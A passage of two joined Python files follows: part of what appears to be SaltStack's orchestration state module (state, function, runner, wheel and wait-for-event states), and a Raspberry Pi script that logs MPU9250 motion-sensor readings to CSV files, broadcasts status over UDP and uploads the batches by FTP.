outputs = len(inputs) * [None]
errors = len(inputs) * [None]
def create_thread(index):
def run_thread():
try:
outputs[index] = func(inputs[index])
except: # pylint: disable=bare-except
errors[index] = sys.exc_info()
thread = threading.Thread(target=run_thread)
thread.start()
return thread
threads = list(map(create_thread, range(len(inputs))))
for thread in threads:
thread.join()
for error in errors:
if error is not None:
exc_type, exc_value, exc_traceback = error
raise exc_value.with_traceback(exc_traceback)
return outputs
def state(
name,
tgt,
ssh=False,
tgt_type="glob",
ret="",
ret_config=None,
ret_kwargs=None,
highstate=None,
sls=None,
top=None,
saltenv=None,
test=None,
pillar=None,
pillarenv=None,
expect_minions=True,
exclude=None,
fail_minions=None,
allow_fail=0,
concurrent=False,
timeout=None,
batch=None,
queue=False,
subset=None,
orchestration_jid=None,
failhard=None,
**kwargs
):
"""
Invoke a state run on a given target
name
An arbitrary name used to track the state execution
tgt
The target specification for the state run.
.. versionadded:: 2016.11.0
Masterless support: When running on a masterless minion, the ``tgt``
is ignored and will always be the local minion.
tgt_type
The target type to resolve, defaults to ``glob``
ret
Optionally set a single or a list of returners to use
ret_config
Use an alternative returner configuration
ret_kwargs
Override individual returner configuration items
highstate
Defaults to None, if set to True the target systems will ignore any
sls references specified in the sls option and call state.highstate
on the targeted minions
top
Should be the name of a top file. If set state.top is called with this
top file instead of state.sls.
sls
A group of sls files to execute. This can be defined as a single string
containing a single sls file, or a list of sls files
test
Pass ``test=true`` or ``test=false`` through to the state function. This
can be used to override a test mode set in the minion's config file. If
left as the default of None and the 'test' mode is supplied on the
command line, that value is passed instead.
pillar
Pass the ``pillar`` kwarg through to the state function
pillarenv
The pillar environment to grab pillars from
.. versionadded:: 2017.7.0
saltenv
The default salt environment to pull sls files from
ssh
Set to `True` to use the ssh client instead of the standard salt client
roster
In the event of using salt-ssh, a roster system can be set
expect_minions
An optional boolean for failing if some minions do not respond
fail_minions
An optional list of targeted minions where failure is an option
allow_fail
Pass in the number of minions to allow for failure before setting
the result of the execution to False
exclude
Pass exclude kwarg to state
concurrent
Allow multiple state runs to occur at once.
WARNING: This flag is potentially dangerous. It is designed
for use when multiple state runs can safely be run at the same
Do not use this flag for performance optimization.
queue
Pass ``queue=true`` through to the state function
batch
Execute the command :ref:`in batches <targeting-batch>`. E.g.: ``10%``.
.. versionadded:: 2016.3.0
subset
Number of minions from the targeted set to randomly use
.. versionadded:: 2017.7.0
failhard
pass failhard down to the executing state
.. versionadded:: 2019.2.2
Examples:
Run a list of sls files via :py:func:`state.sls <salt.state.sls>` on target
minions:
.. code-block:: yaml
webservers:
salt.state:
- tgt: 'web*'
- sls:
- apache
- django
- core
- saltenv: prod
Run sls file via :py:func:`state.sls <salt.state.sls>` on target
minions with exclude:
.. code-block:: yaml
docker:
salt.state:
- tgt: 'docker*'
- sls: docker
- exclude: docker.swarm
- saltenv: prod
Run a full :py:func:`state.highstate <salt.state.highstate>` on target
mininons.
.. code-block:: yaml
databases:
salt.state:
- tgt: role:database
- tgt_type: grain
- highstate: True
"""
cmd_kw = {"arg": [], "kwarg": {}, "ret": ret, "timeout": timeout}
if ret_config:
cmd_kw["ret_config"] = ret_config
if ret_kwargs:
cmd_kw["ret_kwargs"] = ret_kwargs
state_ret = {"name": name, "changes": {}, "comment": "", "result": True}
try:
allow_fail = int(allow_fail)
except ValueError:
state_ret["result"] = False
state_ret["comment"] = "Passed invalid value for 'allow_fail', must be an int"
return state_ret
cmd_kw["tgt_type"] = tgt_type
cmd_kw["ssh"] = ssh
if "roster" in kwargs:
cmd_kw["roster"] = kwargs["roster"]
cmd_kw["expect_minions"] = expect_minions
if highstate:
fun = "state.highstate"
elif top:
fun = "state.top"
cmd_kw["arg"].append(top)
elif sls:
fun = "state.sls"
if isinstance(sls, list):
sls = ",".join(sls)
cmd_kw["arg"].append(sls)
else:
state_ret["comment"] = "No highstate or sls specified, no execution made"
state_ret["result"] = False
return state_ret
if test is not None or __opts__.get("test"):
cmd_kw["kwarg"]["test"] = test if test is not None else __opts__.get("test")
if pillar:
cmd_kw["kwarg"]["pillar"] = pillar
if pillarenv is not None:
cmd_kw["kwarg"]["pillarenv"] = pillarenv
if saltenv is not None:
cmd_kw["kwarg"]["saltenv"] = saltenv
if exclude is not None:
cmd_kw["kwarg"]["exclude"] = exclude
cmd_kw["kwarg"]["queue"] = queue
if isinstance(concurrent, bool):
cmd_kw["kwarg"]["concurrent"] = concurrent
else:
state_ret["comment"] = "Must pass in boolean for value of 'concurrent'"
state_ret["result"] = False
return state_ret
if batch is not None:
cmd_kw["batch"] = str(batch)
if subset is not None:
cmd_kw["subset"] = subset
if failhard is True or __opts__.get("failhard"):
cmd_kw["failhard"] = True
masterless = __opts__["__role"] == "minion" and __opts__["file_client"] == "local"
if not masterless:
_fire_args({"type": "state", "tgt": tgt, "name": name, "args": cmd_kw})
cmd_ret = __salt__["saltutil.cmd"](tgt, fun, **cmd_kw)
else:
if top:
cmd_kw["topfn"] = "".join(cmd_kw.pop("arg"))
elif sls:
cmd_kw["mods"] = "".join(cmd_kw.pop("arg"))
cmd_kw.update(cmd_kw.pop("kwarg"))
tmp_ret = __salt__[fun](**cmd_kw)
cmd_ret = {
__opts__["id"]: {
"ret": tmp_ret,
"out": tmp_ret.get("out", "highstate")
if isinstance(tmp_ret, dict)
else "highstate",
}
}
try:
state_ret["__jid__"] = cmd_ret[next(iter(cmd_ret))]["jid"]
except (StopIteration, KeyError):
pass
changes = {}
fail = set()
no_change = set()
if fail_minions is None:
fail_minions = ()
elif isinstance(fail_minions, str):
fail_minions = [minion.strip() for minion in fail_minions.split(",")]
elif not isinstance(fail_minions, list):
state_ret.setdefault("warnings", []).append(
"'fail_minions' needs to be a list or a comma separated string. Ignored."
)
fail_minions = ()
if not cmd_ret and expect_minions:
state_ret["result"] = False
state_ret["comment"] = "No minions returned"
return state_ret
for minion, mdata in cmd_ret.items():
if mdata.get("out", "") != "highstate":
log.warning("Output from salt state not highstate")
m_ret = False
if "return" in mdata and "ret" not in mdata:
mdata["ret"] = mdata.pop("return")
m_state = True
if mdata.get("failed", False):
m_state = False
else:
try:
m_ret = mdata["ret"]
except KeyError:
m_state = False
if m_state:
m_state = __utils__["state.check_result"](m_ret, recurse=True)
if not m_state:
if minion not in fail_minions:
fail.add(minion)
changes[minion] = m_ret
continue
try:
for state_item in m_ret.values():
if isinstance(state_item, dict):
if "changes" in state_item and state_item["changes"]:
changes[minion] = m_ret
break
else:
no_change.add(minion)
except AttributeError:
log.error("m_ret did not have changes %s %s", type(m_ret), m_ret)
no_change.add(minion)
if changes:
state_ret["changes"] = {"out": "highstate", "ret": changes}
if len(fail) > allow_fail:
state_ret["result"] = False
state_ret["comment"] = "Run failed on minions: {}".format(", ".join(fail))
else:
state_ret["comment"] = "States ran successfully."
if changes:
state_ret["comment"] += " Updating {}.".format(", ".join(changes))
if no_change:
state_ret["comment"] += " No changes made to {}.".format(
", ".join(no_change)
)
if test or __opts__.get("test"):
if state_ret["changes"] and state_ret["result"] is True:
# Test mode with changes is the only case where result should ever be none
state_ret["result"] = None
return state_ret
def function(
name,
tgt,
ssh=False,
tgt_type="glob",
ret="",
ret_config=None,
ret_kwargs=None,
expect_minions=False,
fail_minions=None,
fail_function=None,
arg=None,
kwarg=None,
timeout=None,
batch=None,
subset=None,
failhard=None,
**kwargs
): # pylint: disable=unused-argument
"""
Execute a single module function on a remote minion via salt or salt-ssh
name
The name of the function to run, aka cmd.run or pkg.install
tgt
The target specification, aka '*' for all minions
tgt_type
The target type, defaults to ``glob``
arg
The list of arguments to pass into the function
kwarg
The dict (not a list) of keyword arguments to pass into the function
ret
Optionally set a single or a list of returners to use
ret_config
Use an alternative returner configuration
ret_kwargs
Override individual returner configuration items
expect_minions
An optional boolean for failing if some minions do not respond
fail_minions
An optional list of targeted minions where failure is an option
fail_function
An optional string that points to a salt module that returns True or False
based on the returned data dict for individual minions
ssh
Set to `True` to use the ssh client instead of the standard salt client
roster
In the event of using salt-ssh, a roster system can be set
.. versionadded:: 3005
batch
Execute the command :ref:`in batches <targeting-batch>`. E.g.: ``10%``.
subset
Number of minions from the targeted set to randomly use
.. versionadded:: 2017.7.0
failhard
pass failhard down to the executing state
.. versionadded:: 2019.2.2
"""
func_ret = {"name": name, "changes": {}, "comment": "", "result": True}
if kwarg is None:
kwarg = {}
if isinstance(arg, str):
func_ret["warnings"] = ["Please specify 'arg' as a list of arguments."]
arg = arg.split()
cmd_kw = {"arg": arg or [], "kwarg": kwarg, "ret": ret, "timeout": timeout}
if batch is not None:
cmd_kw["batch"] = str(batch)
if subset is not None:
cmd_kw["subset"] = subset
cmd_kw["tgt_type"] = tgt_type
cmd_kw["ssh"] = ssh
if "roster" in kwargs:
cmd_kw["roster"] = kwargs["roster"]
cmd_kw["expect_minions"] = expect_minions
cmd_kw["_cmd_meta"] = True
if failhard is True or __opts__.get("failhard"):
cmd_kw["failhard"] = True
if ret_config:
cmd_kw["ret_config"] = ret_config
if ret_kwargs:
cmd_kw["ret_kwargs"] = ret_kwargs
fun = name
if __opts__["test"] is True:
func_ret["comment"] = "Function {} would be executed on target {}".format(
fun, tgt
)
func_ret["result"] = None
return func_ret
try:
_fire_args({"type": "function", "tgt": tgt, "name": name, "args": cmd_kw})
cmd_ret = __salt__["saltutil.cmd"](tgt, fun, **cmd_kw)
except Exception as exc: # pylint: disable=broad-except
func_ret["result"] = False
func_ret["comment"] = str(exc)
return func_ret
try:
func_ret["__jid__"] = cmd_ret[next(iter(cmd_ret))]["jid"]
except (StopIteration, KeyError):
pass
changes = {}
fail = set()
if fail_minions is None:
fail_minions = ()
elif isinstance(fail_minions, str):
fail_minions = [minion.strip() for minion in fail_minions.split(",")]
elif not isinstance(fail_minions, list):
func_ret.setdefault("warnings", []).append(
"'fail_minions' needs to be a list or a comma separated string. Ignored."
)
fail_minions = ()
for minion, mdata in cmd_ret.items():
m_ret = False
if mdata.get("retcode"):
func_ret["result"] = False
fail.add(minion)
if mdata.get("failed", False):
m_func = False
else:
if "return" in mdata and "ret" not in mdata:
mdata["ret"] = mdata.pop("return")
m_ret = mdata["ret"]
m_func = (not fail_function and True) or __salt__[fail_function](m_ret)
if m_ret is False:
m_func = False
if not m_func:
if minion not in fail_minions:
fail.add(minion)
changes[minion] = m_ret
if not cmd_ret:
func_ret["result"] = False
func_ret["comment"] = "No minions responded"
else:
if changes:
func_ret["changes"] = {"ret": changes}
if fail:
func_ret["result"] = False
func_ret["comment"] = "Running function {} failed on minions: {}".format(
name, ", ".join(fail)
)
else:
func_ret["comment"] = "Function ran successfully."
if changes:
func_ret["comment"] += " Function {} ran on {}.".format(
name, ", ".join(changes)
)
return func_ret
def wait_for_event(name, id_list, event_id="id", timeout=300, node="master"):
"""
Watch Salt's event bus and block until a condition is met
.. versionadded:: 2014.7.0
name
An event tag to watch for; supports Reactor-style globbing.
id_list
A list of event identifiers to watch for -- usually the minion ID. Each
time an event tag is matched the event data is inspected for
``event_id``, if found it is removed from ``id_list``. When ``id_list``
is empty this function returns success.
event_id : id
The name of a key in the event data. Default is ``id`` for the minion
ID, another common value is ``name`` for use with orchestrating
salt-cloud events.
timeout : 300
The maximum time in seconds to wait before failing.
The following example blocks until all the listed minions complete a
restart and reconnect to the Salt master:
.. code-block:: yaml
reboot_all_minions:
salt.function:
- name: system.reboot
- tgt: '*'
wait_for_reboots:
salt.wait_for_event:
- name: salt/minion/*/start
- id_list:
- jerry
- stuart
- dave
- phil
- kevin
- mike
- require:
- salt: reboot_all_minions
"""
ret = {"name": name, "changes": {}, "comment": "", "result": False}
if __opts__.get("test"):
ret["comment"] = "Orchestration would wait for event '{}'".format(name)
ret["result"] = None
return ret
with salt.utils.event.get_event(
node, __opts__["sock_dir"], opts=__opts__, listen=True
) as sevent:
del_counter = 0
starttime = time.time()
timelimit = starttime + timeout
while True:
event = sevent.get_event(full=True)
is_timedout = time.time() > timelimit
if event is None and not is_timedout:
log.trace("wait_for_event: No event data; waiting.")
continue
elif event is None and is_timedout:
ret["comment"] = "Timeout value reached."
return ret
if fnmatch.fnmatch(event["tag"], name):
val = event["data"].get(event_id)
if val is None and "data" in event["data"]:
val = event["data"]["data"].get(event_id)
if val is not None:
try:
val_idx = id_list.index(val)
except ValueError:
log.trace(
"wait_for_event: Event identifier '%s' not in "
"id_list; skipping.",
event_id,
)
else:
del id_list[val_idx]
del_counter += 1
minions_seen = ret["changes"].setdefault("minions_seen", [])
minions_seen.append(val)
log.debug(
"wait_for_event: Event identifier '%s' removed "
"from id_list; %s items remaining.",
val,
len(id_list),
)
else:
log.trace(
"wait_for_event: Event identifier '%s' not in event "
"'%s'; skipping.",
event_id,
event["tag"],
)
else:
log.debug("wait_for_event: Skipping unmatched event '%s'", event["tag"])
if len(id_list) == 0:
ret["result"] = True
ret["comment"] = "All events seen in {} seconds.".format(
time.time() - starttime
)
return ret
if is_timedout:
ret["comment"] = "Timeout value reached."
return ret
def runner(name, **kwargs):
"""
Execute a runner module on the master
.. versionadded:: 2014.7.0
name
The name of the function to run
kwargs
Any keyword arguments to pass to the runner function
.. code-block:: yaml
run-manage-up:
salt.runner:
- name: manage.up
"""
try:
jid = __orchestration_jid__
except NameError:
log.debug("Unable to fire args event due to missing __orchestration_jid__")
jid = None
if __opts__.get("test", False):
ret = {
"name": name,
"result": None,
"changes": {},
"comment": "Runner function '{}' would be executed.".format(name),
}
return ret
out = __salt__["saltutil.runner"](
name, __orchestration_jid__=jid, __env__=__env__, full_return=True, **kwargs
)
runner_return = out.get("return")
if isinstance(runner_return, dict) and "Error" in runner_return:
out["success"] = False
success = out.get("success", True)
ret = {"name": name, "changes": {"return": runner_return}, "result": success}
ret["comment"] = "Runner function '{}' {}.".format(
name,
"executed" if success else "failed",
)
ret["__orchestration__"] = True
if "jid" in out:
ret["__jid__"] = out["jid"]
return ret
def parallel_runners(name, runners, **kwargs): # pylint: disable=unused-argument
"""
Executes multiple runner modules on the master in parallel.
.. versionadded:: 2018.3.0
A separate thread is spawned for each runner. This state is intended to be
used with the orchestrate runner in place of the ``saltmod.runner`` state
when different tasks should be run in parallel. In general, Salt states are
not safe when used concurrently, so ensure that they are used in a safe way
(e.g. by only targeting separate minions in parallel tasks).
name:
name identifying this state. The name is provided as part of the
output, but not used for anything else.
runners:
list of runners that should be run in parallel. Each element of the
list has to be a dictionary. This dictionary's name entry stores the
name of the runner function that shall be invoked. The optional kwarg
entry stores a dictionary of named arguments that are passed to the
runner function.
.. code-block:: yaml
parallel-state:
salt.parallel_runners:
- runners:
my_runner_1:
- name: state.orchestrate
- kwarg:
mods: orchestrate_state_1
my_runner_2:
- name: state.orchestrate
- kwarg:
mods: orchestrate_state_2
"""
# For the sake of consistency, we treat a single string in the same way as
# a key without a value. This allows something like
# salt.parallel_runners:
# - runners:
# state.orchestrate
# Obviously, this will only work if the specified runner does not need any
# arguments.
if isinstance(runners, str):
runners = {runners: [{name: runners}]}
# If the runners argument is not a string, it must be a dict. Everything
# else is considered an error.
if not isinstance(runners, dict):
return {
"name": name,
"result": False,
"changes": {},
"comment": "The runners parameter must be a string or dict.",
}
# The configuration for each runner is given as a list of key-value pairs.
# This is not very useful for what we want to do, but it is the typical
# style used in Salt. For further processing, we convert each of these
# lists to a dict. This also makes it easier to check whether a name has
# been specified explicitly.
for runner_id, runner_config in runners.items():
if runner_config is None:
runner_config = {}
else:
runner_config = salt.utils.data.repack_dictlist(runner_config)
if "name" not in runner_config:
runner_config["name"] = runner_id
runners[runner_id] = runner_config
try:
jid = __orchestration_jid__
except NameError:
log.debug("Unable to fire args event due to missing __orchestration_jid__")
jid = None
def call_runner(runner_config):
return __salt__["saltutil.runner"](
runner_config["name"],
__orchestration_jid__=jid,
__env__=__env__,
full_return=True,
**(runner_config.get("kwarg", {}))
)
try:
outputs = _parallel_map(call_runner, list(runners.values()))
except salt.exceptions.SaltException as exc:
return {
"name": name,
"result": False,
"success": False,
"changes": {},
"comment": "One of the runners raised an exception: {}".format(exc),
}
# We bundle the results of the runners with the IDs of the runners so that
# we can easily identify which output belongs to which runner. At the same
# time we exctract the actual return value of the runner (saltutil.runner
# adds some extra information that is not interesting to us).
outputs = {
runner_id: out["return"] for runner_id, out in zip(runners.keys(), outputs)
}
# If each of the runners returned its output in the format compatible with
# the 'highstate' outputter, we can leverage this fact when merging the
# outputs.
highstate_output = all(
[
out.get("outputter", "") == "highstate" and "data" in out
for out in outputs.values()
]
)
# The following helper function is used to extract changes from highstate
# output.
def extract_changes(obj):
if not isinstance(obj, dict):
return {}
elif "changes" in obj:
if (
isinstance(obj["changes"], dict)
and obj["changes"].get("out", "") == "highstate"
and "ret" in obj["changes"]
):
return obj["changes"]["ret"]
else:
return obj["changes"]
else:
found_changes = {}
for key, value in obj.items():
change = extract_changes(value)
if change:
found_changes[key] = change
return found_changes
if highstate_output:
failed_runners = [
runner_id
for runner_id, out in outputs.items()
if out["data"].get("retcode", 0) != 0
]
all_successful = not failed_runners
if all_successful:
comment = "All runner functions executed successfully."
else:
runner_comments = [
"Runner {} failed with return value:\n{}".format(
runner_id,
salt.output.out_format(
outputs[runner_id], "nested", __opts__, nested_indent=2
),
)
for runner_id in failed_runners
]
comment = "\n".join(runner_comments)
changes = {}
for runner_id, out in outputs.items():
runner_changes = extract_changes(out["data"])
if runner_changes:
changes[runner_id] = runner_changes
else:
failed_runners = [
runner_id
for runner_id, out in outputs.items()
if out.get("exit_code", 0) != 0
]
all_successful = not failed_runners
if all_successful:
comment = "All runner functions executed successfully."
else:
if len(failed_runners) == 1:
comment = "Runner {} failed.".format(failed_runners[0])
else:
comment = "Runners {} failed.".format(", ".join(failed_runners))
changes = {"ret": {runner_id: out for runner_id, out in outputs.items()}}
ret = {
"name": name,
"result": all_successful,
"changes": changes,
"comment": comment,
}
# The 'runner' function includes out['jid'] as '__jid__' in the returned
# dict, but we cannot do this here because we have more than one JID if
# we have more than one runner.
return ret
def wheel(name, **kwargs):
"""
Execute a wheel module on the master
.. versionadded:: 2014.7.0
name
The name of the function to run
kwargs
Any keyword arguments to pass to the wheel function
.. code-block:: yaml
accept_minion_key:
salt.wheel:
- name: key.accept
- match: frank
"""
ret = {"name": name, "result": False, "changes": {}, "comment": ""}
try:
jid = __orchestration_jid__
except NameError:
log.debug("Unable to fire args event due to missing __orchestration_jid__")
jid = None
if __opts__.get("test", False):
ret["result"] = (None,)
ret["changes"] = {}
ret["comment"] = "Wheel function '{}' would be executed.".format(name)
return ret
out = __salt__["saltutil.wheel"](
name, __orchestration_jid__=jid, __env__=__env__, **kwargs
)
wheel_return = out.get("return")
if isinstance(wheel_return, dict) and "Error" in wheel_return:
out["success"] = False
success = out.get("success", True)
ret = {"name": name, "changes": {"return": wheel_return}, "result": success}
ret["comment"] = "Wheel function '{}' {}.".format(
name,
"executed" if success else "failed",
)
ret["__orchestration__"] = True
if "jid" in out:
ret["__jid__"] = out["jid"]
return ret
|
threads.py
|
import socket
from threading import Thread
from collections import defaultdict
from datetime import datetime
import os
import time
# from config import channels_dict, ip_server, ip_client, TIME_FORMAT, __version__
from config import channels_dict, TIME_FORMAT, __version__
from ftplib import FTP
import pandas as pd
import sys
def send_via_ftp(session_ftp, path2file, ftp_filename):
file = open(path2file, 'rb')
# print('new file name is ', file_prefix + '.csv')
### MAYBE FILE IS ALREADY ON THE SERVER
ftp_files = session_ftp.nlst()
if ftp_filename in ftp_files:
print('The file ' + ftp_filename + ' is already on the server. I\'m not gonna rewrite it.')
else:
ftp_command = 'STOR ' + ftp_filename
print(ftp_command)
try:
print('Transferring data via FTP...')
session_ftp.storbinary(ftp_command, file) # send the file
print('I didn\'t got an FTP error')
except:
print('I got an FTP error :', sys.exc_info())
print('But probably that\'s ok')
file.close()
def get_df_total(folder):
filenames_list = os.listdir(folder)
filenames_list = sorted([int(filename[:-4]) for filename in filenames_list if filename[-4:] == '.csv'])
filenames_list = [str(x) + '.csv' for x in filenames_list]
df_total = None
for filename in filenames_list:
df = pd.read_csv(folder + '/' + filename, dtype=str)
if df_total is None:
df_total = df
else:
df_total = pd.concat([df_total, df], axis=0).reset_index(drop=True)
return df_total
def get_server_client_ports(channel_id, sensor_id, player_id):
port_server = '6' + channel_id + sensor_id + player_id
port_client = '60' + channel_id + sensor_id
return int(port_server), int(port_client)
def get_socket(ip, port):
print('Trying to create a socket with ip=' + str(ip) + ', port=' + str(port))
new_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
new_socket.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
if ip == '':
new_socket.bind((ip, port))
return new_socket
# def get_ports_adresses_sockets(ip_server, ip_client, channels_dict, sensor_id, player_id,
# get_server_sockets=True, get_client_sockets=False):
def get_ports_adresses_sockets(channels_dict, sensor_id, player_id, ip_server,
get_server_sockets=True, get_client_sockets=False):
ports = defaultdict(dict)
addresses = defaultdict(dict)
sockets = defaultdict(dict)
# TODO: change ip_server and ip_client to <broadcast> and ''
for channel_name, channel_id in channels_dict.items():
ports['server'][channel_name], ports['client'][channel_name] = get_server_client_ports(
channel_id=channel_id,
sensor_id=sensor_id,
player_id=player_id)
# addresses['server'][channel_name] = (ip_server, ports['server'][channel_name])
# addresses['client'][channel_name] = (ip_client, ports['client'][channel_name])
# if channel_name == 'cmd':
# ip_server = '255.255.255.255'
# ip_client = ''
# else:
# ip_client = '255.255.255.255'
# ip_server = ''
# ip_client = '255.255.255.255'
# ip_server = '255.255.255.255'
# addresses['server'][channel_name] = (ip_server, ports['server'][channel_name])
# addresses['client'][channel_name] = (ip_client, ports['client'][channel_name])
addresses['server'][channel_name] = (ip_server, ports['server'][channel_name])
# addresses['server'][channel_name] = ('255.255.255.255', ports['server'][channel_name])
addresses['client'][channel_name] = ('255.255.255.255', ports['client'][channel_name])
if get_server_sockets:
# sockets['server'][channel_name] = get_socket(ip_server, ports['server'][channel_name])
sockets['server'][channel_name] = get_socket('', ports['server'][channel_name])
if get_client_sockets:
# sockets['client'][channel_name] = get_socket(ip_client, ports['client'][channel_name])
sockets['client'][channel_name] = get_socket('', ports['client'][channel_name])
return ports, addresses, sockets
def time_format2timefile_format(x):
return x[:19].replace(':', '-')
class SocketThread(Thread):
def __init__(self, socket, name=None):
super().__init__()
self.socket = socket
if name is not None:
self.name = name
def send(self, msg, address):
"""
:param address: tuple (ip, port)
:param msg: string message
"""
self.socket.sendto(msg.encode(), address)
class ListenerThread(SocketThread):
def __init__(self, *args, verbose=False, **kwargs):
super().__init__(*args, **kwargs)
self.verbose = verbose
def run(self):
print('Thread ' + self.name + ' are listening...')
while True:
msg, addr = self.socket.recvfrom(1024) # buffer size is 1024 bytes
msg = msg.decode()
if self.verbose:
print("received message:", msg)
print("sender:", addr)
class FtpThread(Thread):
def __init__(self, ftp_ip, login, password):
super().__init__()
self.ftp_ip = ftp_ip
self.login = login
self.password = password
self.session_ftp = FTP(ftp_ip, login, password)
def send(self, path2file, ftp_filename):
send_via_ftp(self.session_ftp, path2file, ftp_filename)
class SenderThread(SocketThread):
def __init__(self, opponent_address, *args, period=0.5, **kwargs):
super().__init__(*args, **kwargs)
self.opponent_address = opponent_address
self.period = period
self.periodic_sending = False
def __repr__(self):
repr = self.__class__.__name__ + '__' + super().__repr__()
return repr
def get_response_msg(self):
return 'not implemented yet'
def send(self, msg=None, address=None):
if msg is None:
msg = self.get_response_msg()
if address is None:
address = self.opponent_address
self.socket.sendto(msg.encode(), address)
def run(self):
while True:
if self.periodic_sending:
self.send()
time.sleep(self.period)
class StatusThread(SenderThread):
def __init__(self, *args, key_order=None, **kwargs):
super().__init__(*args, **kwargs)
self.info_dict = {}
if key_order is None:
self.key_order = ['sensor_name', 'version', 'support_cmd', 'status']
def __setitem__(self, key, value):
self.info_dict[key] = value
def __repr__(self):
repr = self.__class__.__name__ + '__' + super().__repr__() + '__' + str(self.get_response_msg())
return repr
def get_response_msg(self):
response_values = []
for key in self.key_order:
value2append = self.info_dict.get(key, '')
response_values.append(value2append)
response_msg = ','.join(response_values)
return response_msg
class TimeThread(SenderThread):
TIME_THREAD_FORMAT = '%H:%M:%S.%f'
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
def get_response_msg(self):
response_msg = datetime.now().strftime(self.TIME_THREAD_FORMAT)[:-3]
return response_msg
# # def send(self, msg=None, address=None):
# def send(self, msg=None, address='255.255.255.255'): # Probably this broadcast address is not needed anymore
# if msg is None:
# msg = self.get_response_msg()
#
# if address is None:
# address = self.opponent_address
#
# self.socket.sendto(msg.encode(), address)
class AcknowledgementThread(SenderThread):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
### That's actually the same in this form
class MeasurementsThread(SocketThread):
def __init__(self,
socket,
response_address,
mpu9250,
ftp_thread,
# *args,
kwargs,
package_num=0,
):
### WTF??? kwargs doesn't work in the init above
# super().__init__(socket, *args, **kwargs)
super().__init__(socket)# , **kwargs)
self.socket = socket
# self.response_address = response_address
self.response_address = response_address # TODO: WARNING
self.mpu9250 = mpu9250
self.ftp_thread = ftp_thread
self.timestep_detect = kwargs['timestep_detect']
self.timestep_send = kwargs['timestep_send']
self.max_time = kwargs['max_time']
self.verbose = kwargs['verbose']
self.label = kwargs['label']
self.person_id = kwargs['person_id']
self.meta = kwargs['meta']
self.send_data = kwargs['send_data']
self.save_data = kwargs['save_data']
self.folder = kwargs['folder']
self.synchronize_time = kwargs['synchronize_time']
self.stop = False # Stop variable
self.batch_size = int(self.timestep_send / self.timestep_detect) # Количество измерений в одном файле
self.n_batches = int(self.max_time / self.timestep_send) # Количество отправок
self.package_num = package_num
def stop_measurements(self):
self.stop = True
print('Stopping')
# TODO: It loooks like here or nearby I need to create new folders
@staticmethod
def get_sleep_time(timestep_detect):
current_time = time.time()
time2sleep = timestep_detect - current_time % timestep_detect
return time2sleep
def run(self):
if self.folder is None:
folder = datetime.now().strftime(TIME_FORMAT)[:-3]
else:
folder = self.folder
self.folder = folder # FOR THE FTP
# prefix = '../data/' + folder + '/'
prefix = '/home/pi/data/' + folder + '/'
# os.mkdir('../data/' + folder) # Here we will store data in batches
os.mkdir(prefix) # Here we will store data in batches
data_header = ['datetime_now', 'acc_x', 'acc_y', 'acc_z', 'gyro_x', 'gyro_y', 'gyro_z', 'mag_x', 'mag_y',
'mag_z']
data_header2write = ','.join(data_header) + '\n'
for n_batch in range(self.n_batches):
filename = prefix + str(n_batch) + '.csv'
file = open(filename, 'w')
file.write(data_header2write)
for n_measurement in range(self.batch_size):
data_accelerometer = self.mpu9250.readAccel()
data_gyroscope = self.mpu9250.readGyro()
data_magnetometer = self.mpu9250.readMagnet()
# data_magnetometer = {
# 'x': -1,
# 'y': -1,
# 'z': -1,
# }
if self.verbose:
if (n_measurement % self.verbose) == 0:
print('data_accelerometer: ', data_accelerometer)
print('data_gyroscope: ', data_gyroscope)
print('data_magnetometer: ', data_magnetometer)
datetime_current = datetime.now()
datetime_current_isoformat = datetime_current.isoformat()
if n_measurement == 0:
first_datetime_in_batch = datetime_current.strftime(TIME_FORMAT)
first_datetime_in_batch = time_format2timefile_format(first_datetime_in_batch)
measurement_data = [
datetime_current_isoformat,
data_accelerometer['x'],
data_accelerometer['y'],
data_accelerometer['z'],
data_gyroscope['x'],
data_gyroscope['y'],
data_gyroscope['z'],
data_magnetometer['x'],
data_magnetometer['y'],
data_magnetometer['z'],
]
# measurement_data = [str(value) for value in measurement_data] # Commented on 31 Oct to fix rounding
for i in range(1, len(measurement_data)): # Rounding to exactly 3 digits
measurement_data[i] = "%.3f" % measurement_data[i]
# ### It looks like the trick above is not enough to round to exactly 3 digits.
# ### That's why I added the code below
# value_parts = measurement_data[i].split('.')
# value_parts[1] = value_parts[1][:3] # Cutting everything after the 3rd digit
# measurement_data[i] = '.'.join(value_parts)
# # measurement_data[i] = "%.3f" % measurement_data[i] # TODO: check in google why rounding isn't working
data2write = ','.join(measurement_data) + '\n'
file.write(data2write)
# measurement_data4server = [
# str(self.package_num), # n
# measurement_data[0][:-3], # microseconds are ignored
# ] + measurement_data[1:]
#
# # data2send = str(self.package_num) + ',' + ','.join(measurement_data) # New line character is not added
# data2send = ','.join(measurement_data4server) # New line character is not added
# if self.send_data:
# self.socket.sendto(data2send.encode(), self.response_address) # TODO: add number of row n
self.package_num += 1
if self.stop:
break
if n_measurement != self.batch_size - 1: # Because if n_measurement != batch_size - 1 we need to consider time for file.close()
time2sleep = self.get_sleep_time(self.timestep_detect)
time.sleep(time2sleep)
file.close()
ftp_filename = 'chair__' + first_datetime_in_batch + '.csv'
if self.send_data:
self.ftp_thread.send(filename, ftp_filename) # ftp_filename should be the 'chair_' + the first date. consider using already implemented functions
if self.stop:
break
time2sleep = self.get_sleep_time(self.timestep_detect)
time.sleep(time2sleep)
print('---------------------------')
print('----End of measurements----')
print('---------------------------')
class CmdThread(ListenerThread):
def __init__(self,
socket,
addresses,
status_thread,
time_thread,
# measurements_thread,
acknowledgement_thread,
mpu9250,
measurement_thread_kwargs,
ftp_thread,
player_id,
*args,
verbose=False,
sockets=None,
**kwargs):
super().__init__(socket, *args, verbose=verbose, **kwargs)
self.addresses = addresses
self.status_thread = status_thread
self.time_thread = time_thread
self.time_thread.periodic_sending = True
# self.measurements_thread = measurements_thread
self.acknowledgement_thread = acknowledgement_thread
self.mpu9250 = mpu9250
self.measurement_thread_kwargs = measurement_thread_kwargs
self.sockets = sockets
self.package_num = 0 # For measurements_thread
self.player_id = player_id
self.ftp_thread = ftp_thread
# self.last_ftp_file_prefix = None
# @staticmethod
def stop_measurements(self, measurements_thread):
print('Trying to stop')
if measurements_thread is None:
print('measurements_thread is None, please initialize it beforehand')
else:
measurements_thread.stop_measurements()
self.package_num = measurements_thread.package_num
measurements_thread.join()
print('Measurements thread is killed')
